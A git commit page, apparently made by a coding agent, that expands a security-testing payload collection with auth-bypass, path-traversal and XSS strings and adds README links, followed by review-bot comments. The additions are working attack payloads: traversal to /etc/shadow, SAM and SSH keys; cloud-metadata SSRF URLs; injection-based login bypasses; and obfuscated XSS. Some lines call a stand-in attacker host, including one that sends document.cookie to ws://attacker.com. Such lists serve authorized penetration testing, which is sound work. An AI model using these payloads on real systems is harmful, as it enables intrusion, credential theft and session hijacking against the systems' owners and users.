Enhance existing vulnerabilities with comprehensive payloads (XSS, Auth Bypass, Path Traversal) and update README

Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
copilot-swe-agent[bot]
2026-01-05 14:53:43 +00:00
parent 68b76036df
commit b58ed035c8
4 changed files with 729 additions and 0 deletions
@@ -45,3 +45,226 @@ X-Original-URL: /admin
X-Rewrite-URL: /admin X-Rewrite-URL: /admin
X-Originating-IP: 127.0.0.1 X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1 X-Remote-Addr: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Host: localhost
X-Forwarded-Host: localhost
# URL path manipulation
/admin/..;/
/admin/%2e%2e%3b/
/./admin/./
/admin;/
/admin..
//admin//
/./admin/./panel
/%2e/admin
/admin/~
/admin#
/admin?
# HTTP verb tampering
GET /admin
POST /admin
HEAD /admin
PUT /admin
DELETE /admin
OPTIONS /admin
TRACE /admin
PATCH /admin
# Case manipulation
/Admin
/ADMIN
/AdMiN
/aDmIn
# Unicode bypass
/admin%c0%af
/admin%e0%80%af
/admin%c0%ae%c0%ae/
/%61dmin
# Double encoding
/%252e%252e%252fadmin
/%252e%252e/admin
# Null byte injection
/admin%00
/admin%00.html
/admin%00.jpg
# Credential stuffing patterns
admin:admin
administrator:administrator
root:root
admin:password
admin:123456
admin:admin123
test:test
guest:guest
user:user
demo:demo
# Default credentials bypass
username=admin&password=
username=&password=
username=admin&password=%20
username=admin&password=*
# Password reset bypass
email=victim@example.com&email=attacker@example.com
token=&email=attacker@example.com
token=0
token=null
token=false
# OTP/2FA bypass
otp=000000
otp=123456
otp=111111
otp=
otp=%20
otp=null
# Response manipulation
# Change HTTP response from 401/403 to 200
# Change "authenticated": false to "authenticated": true
# Change "role": "user" to "role": "admin"
# JWT manipulation (see JWT-Vulnerabilities for more)
Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
Authorization: Bearer null
Authorization: Bearer
Authorization:
# GraphQL authentication bypass
{"query":"mutation{login(username:\"admin\",password:\"' OR '1'='1\"){token}}"}
{"query":"{users{id username password}}"}
# XML authentication bypass
<user><username>admin</username><password>' OR '1'='1</password></user>
# LDAP authentication bypass
username=*
username=admin)(|(password=*
username=*)(uid=*))(|(uid=*
# OAuth/OIDC bypass
redirect_uri=https://attacker.com
state=
nonce=
code=
# API key bypass
api_key=
X-API-Key:
Authorization:
apikey=null
# Session fixation
PHPSESSID=attacker_controlled_session
jsessionid=12345
# CAPTCHA bypass
captcha=
g-recaptcha-response=
h-captcha-response=
captcha_response=03AAYGu2...
recaptcha=
# Rate limiting bypass
X-Forwarded-For: random_ip_each_request
X-Originating-IP: random_ip_each_request
X-Remote-IP: random_ip_each_request
# Account enumeration
username=admin&password=wrong
username=nonexistent&password=wrong
# Login form variations
user[admin]=1
user[role]=admin
username[]=admin
password[]=anything
# Time-based bypass
wait_for_rate_limit=true
timestamp=future_date
valid_until=9999999999
# Magic hashes (PHP type juggling)
# 0e215962017 == 0 (PHP)
# 0e291242476940776845150308577824 == 0
password=0e215962017
password=240610708
# Unicode normalization
username=ⓐⓓⓜⓘⓝ
username=𝒶𝒹𝓂𝒾𝓃
username=admin
# Homograph attack
username=αdmin (Greek alpha)
username=аdmin (Cyrillic а)
# Whitespace bypass
username= admin
username=admin
username=%20admin
username=admin%20
# Special characters
username=admin'
username=admin"
username=admin`
username=admin\
# Email bypass for authentication
email=admin@localhost
email=admin@127.0.0.1
email=@example.com
email=victim@attacker.com
# Host header authentication bypass
Host: localhost
Host: 127.0.0.1
Host: internal.company.com
# Referer bypass
Referer: https://trusted-site.com
Referer: https://localhost
# Origin bypass
Origin: https://trusted-site.com
Origin: null
# Authentication via GET instead of POST
GET /api/login?username=admin&password=admin123
# File inclusion for authentication bypass
/etc/passwd
../../../../../../etc/passwd
# SSRF to bypass authentication
url=http://localhost/admin
url=http://127.0.0.1/admin
url=http://169.254.169.254/latest/meta-data/
# Request smuggling for authentication bypass
Content-Length: 0
Transfer-Encoding: chunked
# Race conditions
# Send multiple authentication requests simultaneously
# Business logic bypass
step=1&step=3
status=pending&status=approved
verified=false&verified=true
# Broken authentication chain
# Skip step 2 in multi-step authentication
# Reuse old session tokens
# Replay old authentication requests
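Review bot: Several added entries point at real, registrable domains that this project does not control: `redirect_uri=https://attacker.com`, `email=victim@attacker.com`, `Host: internal.company.com`, and the `Referer`/`Origin` lines using `https://trusted-site.com`. When the list is replayed against a test environment, any redirect, mail or outbound request the application generates goes to whoever owns those names; reserved forms such as `attacker.example` and `trusted.example` (RFC 2606) avoid that. The XSS hunk in this commit has the same problem, most visibly the `# WebSocket XSS` line, which sends `document.cookie` to `ws://attacker.com`. Separately, the `# Credential stuffing patterns` heading is inaccurate, since the entries are default and weak pairs rather than replayed breach data; `# Default and weak credential pairs` would match the content.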
+290
@@ -55,3 +55,293 @@
../../../.env ../../../.env
../../../web.config ../../../web.config
../../../application.properties ../../../application.properties
# Advanced encoding techniques
..%c0%af
..%c1%9c
..%e0%80%af
..%f0%80%80%af
..%c0%2f
..%c0%5c
# Unicode bypass
..%u2216
..%u2215
..%uEFC8
..%uF025
# 16-bit Unicode
..%c0%af
..%c1%9c
%c0%ae%c0%ae/
%c0%ae%c0%ae%c0%af
# UTF-8 encoding
%e0%80%ae%e0%80%ae/
%c0%2e%c0%2e/
%uff0e%uff0e/
# Overlong UTF-8
..%c0%af
..%e0%80%af
..%c0%2e%c0%2e%c0%2f
# Backslash variations
..\
..\..
..\\
..\\..\\
%2e%2e%5c
%2e%2e%2f
# Mixed slash/backslash
..\/
..\/..\
../\..\
..\/../
# Absolute path bypass
/etc/passwd
/etc/shadow
/etc/hosts
/var/log/apache2/access.log
/var/log/auth.log
/proc/self/environ
/proc/self/cmdline
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
# Windows absolute paths
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\boot.ini
C:\inetpub\wwwroot\web.config
# Nested traversal
....//
....\/
..../\
....\\
# Dot segment bypass
./../
./../../
././../
./.././../
# Multiple slashes
...//
....///
.....////
# Filter bypass with current directory
.//.//.//.//..//
.//.//.//.//.//
# Stripped traversal (if ../ is filtered)
...//...//
....\/....\/
..;/..;/
..;//..;//
# Null byte variations
../../../etc/passwd%00
../../../etc/passwd%00.png
../../../etc/passwd\x00
../../../etc/passwd\0
# Path normalization bypass
/var/www/../../etc/passwd
/./var/./www/./../../etc/passwd
//var//www//../../etc/passwd
# URL parameter pollution
?file=safe.txt&file=../../../etc/passwd
?path=images&path=../../../etc/passwd
# Common web files
../../../index.php
../../../index.html
../../../wp-config.php
../../../configuration.php
../../../settings.php
../../../config.php
../.git/config
../.env
../.htaccess
# Framework-specific files
# Laravel
../../../.env
../../../storage/logs/laravel.log
../../../config/database.php
../../../config/app.php
# Symfony
../../../.env.local
../../../config/packages/security.yaml
../../../var/log/dev.log
# Django
../../../settings.py
../../../manage.py
../../../db.sqlite3
# Spring Boot
../../../application.properties
../../../application.yml
../../../application-prod.properties
# Ruby on Rails
../../../config/database.yml
../../../config/secrets.yml
../../../Gemfile
# Node.js/Express
../../../package.json
../../../.env
../../../config/default.json
# ASP.NET
../../../web.config
../../../Web.config
../../../appsettings.json
../../../appsettings.Production.json
# Java
../../../WEB-INF/web.xml
../../../META-INF/context.xml
../../../WEB-INF/classes/application.properties
# Cloud provider metadata
../../../../../../proc/self/environ
../../../../../../proc/version
../../../../../../proc/cmdline
# AWS metadata
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/dynamic/instance-identity/document
# Azure metadata
http://169.254.169.254/metadata/instance?api-version=2021-02-01
# GCP metadata
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Docker
../../../../../../proc/self/cgroup
../../../../../../proc/self/mountinfo
../../../../../../etc/hostname
# Log files
../../../var/log/apache2/access.log
../../../var/log/apache2/error.log
../../../var/log/nginx/access.log
../../../var/log/nginx/error.log
../../../var/log/auth.log
../../../var/log/syslog
../../../var/log/mail.log
../../../var/log/mysql/error.log
# Windows log files
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
# SSH keys
../../../root/.ssh/id_rsa
../../../root/.ssh/id_dsa
../../../root/.ssh/authorized_keys
../../../home/user/.ssh/id_rsa
../../../home/user/.ssh/authorized_keys
# Database files
../../../var/lib/mysql/mysql/user.MYD
../../../var/lib/postgresql/data/pg_hba.conf
../../../var/lib/mongodb/data/db
# Backup files
../../../backup.sql
../../../database.sql
../../../db_backup.sql
../../../site_backup.tar.gz
../../../backup.zip
# Source code files
../../../.git/HEAD
../../../.git/config
../../../.git/logs/HEAD
../../../.svn/entries
../../../.hg/hgrc
# Session files
../../../tmp/sess_*
../../../var/lib/php/sessions/sess_*
../../../tmp/sessions/*
# Cache files
../../../tmp/cache/*
../../../var/cache/*
../../../storage/cache/*
# Temporary files
../../../tmp/*
../../../temp/*
../../../var/tmp/*
# SSRF via path traversal
file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts
file://localhost/etc/passwd
file://127.0.0.1/etc/passwd
# Path traversal in cookies
Cookie: file=../../../etc/passwd
Cookie: path=../../../var/www/html/index.php
# Path traversal in headers
X-File: ../../../etc/passwd
X-Path: ../../../var/www/html/config.php
User-Agent: ../../../etc/passwd
Referer: ../../../etc/passwd
# Path traversal in JSON
{"file":"../../../etc/passwd"}
{"path":"../../../var/www/html/config.php"}
{"template":"../../../etc/passwd"}
# Path traversal in XML
<file>../../../etc/passwd</file>
<path>../../../var/www/html/config.php</path>
# Polyglot path traversal
....//....//....//etc/passwd
..%252f..%252f..%252fetc/passwd
..%c0%af..%c0%af..%c0%afetc/passwd
# Filter evasion
..%00/..%00/..%00/etc/passwd
..%20/..%20/..%20/etc/passwd
..%09/..%09/..%09/etc/passwd
# Case sensitivity (Windows)
..\\..\\..\\..\\..\\..\\..\\.\\ETC\\PASSWD
..\\..\\..\\..\\..\\..\\..\\.\\Etc\\Passwd
# Alternate data streams (Windows)
../../../test.txt::$DATA
../../../test.txt::$INDEX_ALLOCATION
# UNC paths (Windows)
\\\\localhost\\C$\\Windows\\System32\\drivers\\etc\\hosts
\\\\127.0.0.1\\C$\\Windows\\System32\\config\\SAM
# Mac/Linux specific
../../../etc/passwd
../../../etc/master.passwd
../../../private/etc/master.passwd
../../../Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist
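Review bot: This hunk re-adds entries that are already in the file: `../../../.env`, `../../../web.config` and `../../../application.properties` are the three context lines at the top of the hunk and appear again under `# Laravel` and `# Node.js/Express`, `# ASP.NET`, and `# Spring Boot`, and `..%c0%af` is listed under three different encoding headings. Duplicates only add request volume when the list is run in an authorized test, so each entry should be kept once, under one heading. Two headings also do not describe their contents: `# 16-bit Unicode` holds overlong UTF-8 byte sequences, and `# Cloud provider metadata` is followed by `/proc` paths. The metadata URLs and the `file://` entries are URL-fetch (SSRF) cases rather than path traversal and would be easier to find in an SSRF list; whether the repository has one is not visible on this page.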
+4
@@ -12,6 +12,7 @@ This repository contains a complete collection of testing payloads organized by
- **[NoSQL Injection](./NoSQL-Injection/)** - NoSQL database injection (MongoDB, Redis, CouchDB) - **[NoSQL Injection](./NoSQL-Injection/)** - NoSQL database injection (MongoDB, Redis, CouchDB)
- **[XSS (Cross-Site Scripting)](./XSS/)** - Client-side code injection - **[XSS (Cross-Site Scripting)](./XSS/)** - Client-side code injection
- **[Command Injection](./Command-Injection/)** - OS command execution & symbolic link attacks - **[Command Injection](./Command-Injection/)** - OS command execution & symbolic link attacks
- **[SSTI (Server-Side Template Injection)](./SSTI/)** - Template engine exploitation & RCE
- **[CSV Injection](./CSV-Injection/)** - Formula injection in spreadsheets - **[CSV Injection](./CSV-Injection/)** - Formula injection in spreadsheets
- **[LDAP Injection](./LDAP-Injection/)** - Directory service manipulation - **[LDAP Injection](./LDAP-Injection/)** - Directory service manipulation
- **[Log Injection](./Log-Injection/)** - Log file manipulation - **[Log Injection](./Log-Injection/)** - Log file manipulation
@@ -34,6 +35,9 @@ This repository contains a complete collection of testing payloads organized by
**Configuration & Design:** **Configuration & Design:**
- **[Security Misconfiguration](./Security-Misconfiguration/)** - Default credentials, misconfigurations - **[Security Misconfiguration](./Security-Misconfiguration/)** - Default credentials, misconfigurations
- **[CORS Misconfiguration](./CORS-Misconfiguration/)** - Cross-origin resource sharing issues
- **[HTTP Request Smuggling](./HTTP-Request-Smuggling/)** - Request desynchronization attacks
- **[JWT Vulnerabilities](./JWT-Vulnerabilities/)** - JSON Web Token implementation flaws
- **[Business Logic](./Business-Logic/)** - Business logic flaws - **[Business Logic](./Business-Logic/)** - Business logic flaws
- **[Weak Cryptography](./Weak-Cryptography/)** - Weak crypto implementations - **[Weak Cryptography](./Weak-Cryptography/)** - Weak crypto implementations
- **[Vulnerable Components](./Vulnerable-Components/)** - Known vulnerable libraries - **[Vulnerable Components](./Vulnerable-Components/)** - Known vulnerable libraries
+212
@@ -541,3 +541,215 @@ a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
# SVG/HTML nesting XSS # SVG/HTML nesting XSS
<svg></svg></iframe> <svg></svg></iframe>
# Modern XSS vectors and WAF bypasses
# AngularJS template injection
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{$eval.constructor('alert(1)')()}}
{{$parent.constructor('alert(1)')()}}
<div ng-app ng-csp><div ng-controller="test">{{$eval.constructor('alert(1)')()}}</div></div>
# VueJS template injection
{{constructor.constructor('alert(1)')()}}
{{_c.constructor('alert(1)')()}}
<div v-html="'<img src=x onerror=alert(1)>'"></div>
# React JSX injection
<img src=x onerror={alert(1)} />
<div dangerouslySetInnerHTML={{__html: '<img src=x onerror=alert(1)>'}} />
# Mutation XSS (mXSS)
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
<listing>&lt;img src=x onerror=alert(1)&gt;</listing>
<style><img src=x onerror=alert(1)></style>
# DOM clobbering
<form id=test><input id=test2></form><form id=test2><input id=test></form>
<img name=alert id=alert src=x onerror=alert(1)>
<form name=test><input id=attributes></form>
# Polyglot XSS
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
# HTML5 new tags
<details open ontoggle=alert(1)>
<details open ontoggle="alert(1)">
<marquee onstart=alert(1)>
<meter onmouseover=alert(1)>0</meter>
<progress value=0 max=100 onmouseover=alert(1)>
<dialog open onclose=alert(1)>
<keygen onfocus=alert(1)>
# WebSocket XSS
<script>ws=new WebSocket('ws://attacker.com');ws.send(document.cookie);</script>
# postMessage XSS
<script>parent.postMessage('<img src=x onerror=alert(1)>','*')</script>
<iframe src="javascript:parent.postMessage('<img src=x onerror=alert(1)>','*')">
# Web Worker XSS
<script>w=new Worker('data:text/javascript,postMessage(document.cookie)');</script>
# Service Worker XSS
<script>navigator.serviceWorker.register('data:text/javascript,alert(1)')</script>
# CSS-based XSS
<style>@import'data:text/css,body{background:url(javascript:alert(1))}';</style>
<style>*{background:url('javascript:alert(1)')}</style>
<link rel=stylesheet href='data:text/css,*{x:expression(alert(1))}'>
# XML namespace XSS
<html xmlns:xss>
<?import namespace="xss" implementation="http://attacker.com/xss.htc"?>
<xss:xss>test</xss:xss>
# XSLT XSS
<xsl:value-of select="system-property('xsl:vendor')"/>
<xsl:template match="/">
<script>alert(1)</script>
</xsl:template>
# Unicode bypass
\u003cscript\u003ealert(1)\u003c/script\u003e
<script>alert\u0028 1\u0029</script>
\x3cscript\x3ealert(1)\x3c/script\x3e
# Octal encoding
\74\163\143\162\151\160\164\76alert(1)\74\57\163\143\162\151\160\164\76
# Hex encoding
\x3c\x73\x63\x72\x69\x70\x74\x3ealert(1)\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e
# HTML entity encoding
&lt;script&gt;alert(1)&lt;/script&gt;
&#60;script&#62;alert(1)&#60;/script&#62;
&#x3c;script&#x3e;alert(1)&#x3c;/script&#x3e;
# Double encoding
%253Cscript%253Ealert(1)%253C%2Fscript%253E
# UTF-7 encoding
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
# WAF bypass with comments
<scr<!---->ipt>alert(1)</scr<!---->ipt>
<scr<script>ipt>alert(1)</scr</script>ipt>
# WAF bypass with null bytes
<script\x00>alert(1)</script>
<scri\x00pt>alert(1)</scri\x00pt>
# WAF bypass with newlines
<script
>alert(1)</script>
<scri\npt>alert(1)</scri\npt>
# Obfuscated JavaScript
<script>eval(atob('YWxlcnQoMSk='))</script>
<script>Function('alert(1)')()</script>
<script>[1].map(alert)</script>
<script>top[/al/.source+/ert/.source](1)</script>
# JSFuck
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
# Content Security Policy bypass
<link rel="prefetch" href="javascript:alert(1)">
<link rel="prerender" href="javascript:alert(1)">
<base href="javascript:alert(1)//">
# srcdoc iframe XSS
<iframe srcdoc="<script>alert(1)</script>">
<iframe srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;">
# HTML imports XSS
<link rel="import" href="data:text/html,<script>alert(1)</script>">
# Script gadgets
<div id=x tabindex=1 onfocus=alert(1)></div><input value=clickme>
<input onfocus=alert(1) autofocus>
<input onblur=alert(1) autofocus><input autofocus>
<video poster=javascript:alert(1)//></video>
<body onload=alert(1)>
<body oninput=alert(1)><input autofocus>
# RPO (Relative Path Overwrite)
<script src="//attacker.com/poc.js"></script>
<script src="/poc.js"></script>
# Dangling markup injection
"><img src='//attacker.com?
'><img src='//attacker.com?
# AngularJS 1.6+ sandbox bypass
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}
# Template literals
<script>eval(`alert\x281\x29`)</script>
<script>Function`x${alert`1`}x`</script>
# Arrow functions
<script>_=alert,_(1)</script>
<script>(alert)(1)</script>
<script>[alert][0](1)</script>
# ES6 features
<script>({alert}={alert:alert},{alert}(1))</script>
<script>[a,b,c,...alert]=1</script>
# Event handlers with spaces
< img src=x onerror=alert(1)>
<img src=x onerror= alert(1)>
<img src=x onerror = alert(1)>
# Without quotes
<img src=x onerror=alert(1)>
<img src=x onerror=alert`1`>
<img src=x onerror=alert(document.domain)>
# Protocol-relative URL
<script src=//attacker.com/xss.js></script>
<img src=//attacker.com/x onerror=alert(1)>
# Meta refresh XSS
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
<meta http-equiv="refresh" content="0;url=data:text/html,<script>alert(1)</script>">
# Form action XSS
<form action="javascript:alert(1)"><input type=submit></form>
<form><button formaction="javascript:alert(1)">Click</button></form>
# Object data XSS
<object data="javascript:alert(1)">
<object data="data:text/html,<script>alert(1)</script>">
# Embed src XSS
<embed src="javascript:alert(1)">
<embed src="data:text/html,<script>alert(1)</script>">
# Applet XSS
<applet code="java.lang.Runtime">
# Audio/Video XSS
<audio src=x onerror=alert(1)>
<video src=x onerror=alert(1)>
# Picture XSS
<picture><source srcset="javascript:alert(1)"></picture>
# Track XSS
<video><track default src="javascript:alert(1)"></video>
# Shadow DOM XSS
<div><template shadowroot=open><script>alert(1)</script></template></div>
# Custom elements XSS
<custom-element onconnected=alert(1)>
# Web Components XSS
<x-element><script>alert(1)</script></x-element>
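Review bot: Several headings in this hunk do not match what is listed under them, which makes the file misleading as reference material. `# React JSX injection` and the `v-html` line under `# VueJS template injection` are source-code sinks that a developer writes, not strings that arrive as input, so they belong under a heading such as `# Framework sinks to audit (developer-side)`. `# AngularJS 1.6+ sandbox bypass` repeats two entries already listed under `# AngularJS template injection`, and the expression sandbox was removed in AngularJS 1.6, so the heading should name the versions it actually applies to. `# Arrow functions` contains no arrow function. A one-line comment per section naming the context it exercises and the control expected to stop it (output encoding, CSP, a sanitizer) would make the list usable for verifying a fix.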